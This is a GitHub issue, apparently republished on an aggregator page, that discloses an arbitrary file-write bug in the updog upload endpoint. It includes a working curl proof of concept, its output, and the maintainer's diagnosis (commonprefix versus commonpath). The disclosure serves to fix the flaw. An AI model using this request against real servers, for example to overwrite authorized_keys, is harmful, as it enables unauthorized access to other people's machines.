Vulnerability: Arbitrary file write in CWD
See original GitHub issueAssume you are in the directory ~/cwd
and you do updog -d $(readlink -f ~/www)
. A POST to /upload
with an empty path
parameter will upload the file to ~/cwd
instead of ~/www
~% mkdir ~/www ~/cwd
~% cd ~/cwd
~/cwd% ~/.local/bin/updog -d $(readlink -f ~/www) &
[1] 4124
~/cwd]% [+] Serving /home/justin/www...
* Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)
~/cwd% ls issue
ls: cannot access 'issue': No such file or directory
~/cwd% curl -v http://127.0.0.1:9090/upload -F 'file=@/etc/issue' -F 'path='
* Expire in 0 ms for 6 (transfer 0x5585447baf90)
* Trying 127.0.0.1...
* TCP_NODELAY set
* Expire in 200 ms for 4 (transfer 0x5585447baf90)
* Connected to 127.0.0.1 (127.0.0.1) port 9090 (#0)
> POST /upload HTTP/1.1
> Host: 127.0.0.1:9090
> User-Agent: curl/7.64.0
> Accept: */*
> Content-Length: 317
> Content-Type: multipart/form-data; boundary=------------------------286bd5dc6119e79d
>
127.0.0.1 - - [19/Feb/2020 12:22:22] "POST /upload HTTP/1.1" 302 -
* HTTP 1.0, assume close after body
< HTTP/1.0 302 FOUND
< Content-Type: text/html; charset=utf-8
< Content-Length: 207
< Location: http://127.0.0.1:9090/None
< Server: Werkzeug/1.0.0 Python/3.7.6
< Date: Wed, 19 Feb 2020 01:22:22 GMT
<
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
* Closing connection 0
<p>You should be redirected automatically to target URL: <a href=""></a>. If not click the link.
~/cwd% ls issue
issue
~/cwd% cat issue
Debian GNU/Linux 10 \n \l
If the user is in ~
or another interesting directory at the time of doing updog -d /some/other/directory
then a remote attacker can overwrite interesting files such as .ssh/authorized_keys
Issue Analytics
- State:
- Created 4 years ago
- Comments:6 (4 by maintainers)
Top Results From Across the Web
Arbitrary File Write via Archive Extraction (Zip Slip) in zip-local
Affected versions of this package are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) which can lead to an extraction ...
Read more >Arbitrary File Writes | Vulnerability Fix Database - ShiftLeft
A web-server that permits arbitrary file writes to be triggered by maliciously crafted HTTP requests will allow an attacker to drop malicious files...
Read more >Remote Code Execution using Arbitrary File Writes & MultiDex ...
We examine vulnerabilities that allow attackers to execute code remotely on an Android userUs device.
Read more >Technical Advisory – Apple XAR – Arbitrary File Write (CVE ...
The xar utility suffers from a logical vulnerability which allows files to be extracted outside of the intended destination folder, resulting ...
Read more >Arbitrary file download: Breaking into the system
As the name suggests, if the web application doesn't check the file name required by the user, any malicious user can exploit this...
Read more >Top Related Medium Post
No results found
Top Related StackOverflow Question
No results found
Troubleshoot Live Code
Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start FreeTop Related Reddit Thread
No results found
Top Related Hackernoon Post
No results found
Top Related Tweet
No results found
Top Related Dev.to Post
No results found
Top Related Hashnode Post
No results found
Top GitHub Comments
I think this is because I’m using
os.path.commonprefix
instead ofos.path.commonpath
. Interesting edge case. Thanks!@justinsteven curious to hear your thoughts. And thanks so much for your contributions!